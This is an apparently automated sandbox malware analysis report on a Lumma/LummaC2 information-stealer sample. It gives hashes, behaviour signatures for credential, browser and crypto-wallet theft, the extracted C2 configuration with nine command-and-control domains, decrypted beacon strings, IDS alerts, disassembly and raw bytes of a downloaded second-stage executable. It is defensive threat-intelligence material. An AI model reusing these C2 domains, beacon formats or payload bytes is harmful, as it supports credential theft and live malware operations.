Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
goldlummaa.exe

Overview

General Information

Sample name:goldlummaa.exe
Analysis ID:1577492
MD5:876bf2dec67ea8626322d2c268219d76
SHA1:ecb0c0cd486733491804a05cf387f2d04d5e2279
SHA256:08d37bbc1881f5fbfdcc84e3270320bb4d03a3ad4fcdf1d996c9de0ca8f2b425
Tags:18521511316185215113209bulletproofexeLummaStealeruser-abus3reports
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • goldlummaa.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\goldlummaa.exe" MD5: 876BF2DEC67EA8626322D2C268219D76)
    • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • goldlummaa.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\goldlummaa.exe" MD5: 876BF2DEC67EA8626322D2C268219D76)
      • WerFault.exe (PID: 7848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 592 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 8184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7460 -s 1616 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "tacitglibbr.biz", "effecterectz.xyz", "immureprech.biz", "debonairnukk.xyz"], "Build id": "LOGS11--LiveTraffic"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000003.1572243214.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.1576307805.0000000000B5D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.1576837970.0000000000B0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              00000003.00000003.1576336868.0000000000B0D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 6 entries
                SourceRuleDescriptionAuthorStrings
                3.2.goldlummaa.exe.400000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  3.2.goldlummaa.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:17:39.594103+010020283713Unknown Traffic192.168.2.949722104.21.50.161443TCP
                    2024-12-18T14:17:41.765494+010020283713Unknown Traffic192.168.2.949728104.21.50.161443TCP
                    2024-12-18T14:17:44.904371+010020283713Unknown Traffic192.168.2.949734104.21.50.161443TCP
                    2024-12-18T14:17:49.032054+010020283713Unknown Traffic192.168.2.949745104.21.50.161443TCP
                    2024-12-18T14:17:54.303194+010020283713Unknown Traffic192.168.2.949756104.21.50.161443TCP
                    2024-12-18T14:17:59.203645+010020283713Unknown Traffic192.168.2.949769104.21.50.161443TCP
                    2024-12-18T14:18:03.131445+010020283713Unknown Traffic192.168.2.949780104.21.50.161443TCP
                    2024-12-18T14:18:11.769477+010020283713Unknown Traffic192.168.2.949801104.21.50.161443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:17:40.391480+010020546531A Network Trojan was detected192.168.2.949722104.21.50.161443TCP
                    2024-12-18T14:17:43.299167+010020546531A Network Trojan was detected192.168.2.949728104.21.50.161443TCP
                    2024-12-18T14:18:13.537532+010020546531A Network Trojan was detected192.168.2.949801104.21.50.161443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:17:40.391480+010020498361A Network Trojan was detected192.168.2.949722104.21.50.161443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:17:43.299167+010020498121A Network Trojan was detected192.168.2.949728104.21.50.161443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:17:39.594103+010020582311Domain Observed Used for C2 Detected192.168.2.949722104.21.50.161443TCP
                    2024-12-18T14:17:41.765494+010020582311Domain Observed Used for C2 Detected192.168.2.949728104.21.50.161443TCP
                    2024-12-18T14:17:44.904371+010020582311Domain Observed Used for C2 Detected192.168.2.949734104.21.50.161443TCP
                    2024-12-18T14:17:49.032054+010020582311Domain Observed Used for C2 Detected192.168.2.949745104.21.50.161443TCP
                    2024-12-18T14:17:54.303194+010020582311Domain Observed Used for C2 Detected192.168.2.949756104.21.50.161443TCP
                    2024-12-18T14:17:59.203645+010020582311Domain Observed Used for C2 Detected192.168.2.949769104.21.50.161443TCP
                    2024-12-18T14:18:03.131445+010020582311Domain Observed Used for C2 Detected192.168.2.949780104.21.50.161443TCP
                    2024-12-18T14:18:11.769477+010020582311Domain Observed Used for C2 Detected192.168.2.949801104.21.50.161443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:18:15.030238+010020197142Potentially Bad Traffic192.168.2.949807185.215.113.1680TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:17:38.040410+010020582301Domain Observed Used for C2 Detected192.168.2.9621581.1.1.153UDP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T14:18:01.489309+010020480941Malware Command and Control Activity Detected192.168.2.949769104.21.50.161443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://tacitglibbr.biz/eAvira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/hAvira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/sAvira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/al6Avira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/api.Avira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/peratiAvira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/int16CAvira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/rs.Avira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz//Avira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/.Avira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/apiXAvira URL Cloud: Label: malware
                    Source: https://tacitglibbr.biz/5nascrAvira URL Cloud: Label: malware
                    Source: 00000000.00000002.1377238793.000000000122E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["diffuculttan.xyz", "deafeninggeh.biz", "wrathful-jammy.cyou", "awake-weaves.cyou", "sordid-snaked.cyou", "tacitglibbr.biz", "effecterectz.xyz", "immureprech.biz", "debonairnukk.xyz"], "Build id": "LOGS11--LiveTraffic"}
                    Source: goldlummaa.exeReversingLabs: Detection: 78%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
                    Source: goldlummaa.exeJoe Sandbox ML: detected
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sordid-snaked.cyou
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: awake-weaves.cyou
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: wrathful-jammy.cyou
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: debonairnukk.xyz
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: diffuculttan.xyz
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: effecterectz.xyz
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: deafeninggeh.biz
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: immureprech.biz
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tacitglibbr.biz
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                    Source: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00415298 CryptUnprotectData,3_2_00415298
                    Source: goldlummaa.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49722 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49734 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49756 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49769 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49780 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.9:49801 version: TLS 1.2
                    Source: goldlummaa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C6BE9A FindFirstFileExW,0_2_00C6BE9A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 0_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00C6BF4B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C6BE9A FindFirstFileExW,3_2_00C6BE9A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 3_2_00C6BF4B FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00C6BF4B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00425990
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx ecx, di3_2_00425990
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx ebx, byte ptr [edi+eax]3_2_00415298
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00415298
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CAA82E26h3_2_0043CB20
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0042C45C
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4FC
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0042B4FC
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], E88DDEA1h3_2_0043CD60
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edi, byte ptr [edx+ecx]3_2_0040DD25
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, edx3_2_0040BDC9
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0040CFF3
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx eax, byte ptr [eax+ecx-6A653384h]3_2_0040CFF3
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp al, 2Eh3_2_00426054
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then jmp eax3_2_00426054
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05D
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05D
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B068
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B068
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx ebx, byte ptr [eax+ecx-3F9DFECCh]3_2_0040E83B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [esi+ebp*8], B1025CF1h3_2_0043B05B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B05B
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0040A940
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov edx, ecx3_2_0040A940
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+38h]3_2_0040C917
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then jmp ecx3_2_0043C1F0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx-57437DD5h]3_2_0043B195
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movsx eax, byte ptr [esi]3_2_0043B9A1
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], A269EEEFh3_2_004369A0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx]3_2_0041E9B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_004299B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then lea eax, dword ptr [esp+18h]3_2_0042526A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ebx, edi3_2_0041D270
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov esi, eax3_2_00423A34
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], 2298EE00h3_2_0043D2F0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edx, word ptr [eax]3_2_0043D2F0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then jmp ecx3_2_0043C280
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0043AAB2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov word ptr [ebp+00h], 0000h3_2_004252BA
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_004252BA
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov eax, ebx3_2_0041CB05
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov edx, eax3_2_00427326
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_004143C2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov edi, dword ptr [esp+34h]3_2_004143C2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042A3D0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ebp, dword ptr [eax]3_2_00436C00
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, dword ptr [esi+64h]3_2_00418578
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov edx, eax3_2_0042750D
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_00421D10
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000BFh]3_2_00417582
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+0233DBB1h]3_2_00427DA2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp word ptr [ebx+ecx], 0000h3_2_004205B0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C64A
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0042AE48
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then jmp eax3_2_00426E50
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+000000B8h]3_2_0042B4F7
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0042B4F7
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0042AE24
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00433630
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C6E4
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+20h]3_2_00425E90
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 88822328h3_2_0043CE90
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004166A0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041BEA0
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov ecx, eax3_2_0042ADF4
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov eax, edx3_2_0041C6BB
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then jmp eax3_2_0043BF40
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edi, byte ptr [edx+eax-000000A8h]3_2_00415F66
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], A896961Ch3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6E83E51Eh3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 6E83E51Eh3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 67F3D776h3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 67F3D776h3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B7C1BB11h3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 6E83E51Eh3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], B430E561h3_2_00419770
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov edx, dword ptr [ebp-10h]3_2_0043A777
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-78E52646h]3_2_00409700
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax-46h]3_2_00409700
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+16h]3_2_00409700
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C726
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042C735
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then mov byte ptr [ebp+00h], al3_2_0041DF80
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2
                    Source: C:\Users\user\Desktop\goldlummaa.exeCode function: 4x nop then movzx edx, byte ptr [esi+eax-00000089h]3_2_0040D7A2

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49728 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49734 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49769 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49780 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49722 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2058230 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tacitglibbr .biz) : 192.168.2.9:62158 -> 1.1.1.1:53
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49801 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49745 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2058231 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (tacitglibbr .biz in TLS SNI) : 192.168.2.9:49756 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49722 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49769 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49722 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49728 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49728 -> 104.21.50.161:443
                    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49801 -> 104.21.50.161:443
                    Source: Malware configuration extractorURLs: diffuculttan.xyz
                    Source: Malware configuration extractorURLs: deafeninggeh.biz
                    Source: Malware configuration extractorURLs: wrathful-jammy.cyou
                    Source: Malware configuration extractorURLs: awake-weaves.cyou
                    Source: Malware configuration extractorURLs: sordid-snaked.cyou
                    Source: Malware configuration extractorURLs: tacitglibbr.biz
                    Source: Malware configuration extractorURLs: effecterectz.xyz
                    Source: Malware configuration extractorURLs: immureprech.biz
                    Source: Malware configuration extractorURLs: debonairnukk.xyz
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 18 Dec 2024 13:18:14 GMTContent-Type: application/octet-streamContent-Length: 1740288Last-Modified: Wed, 18 Dec 2024 12:15:55 GMTConnection: keep-aliveETag: "6762bcfb-1a8e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 e0 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 45 00 00 04 00 00 93 bb 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 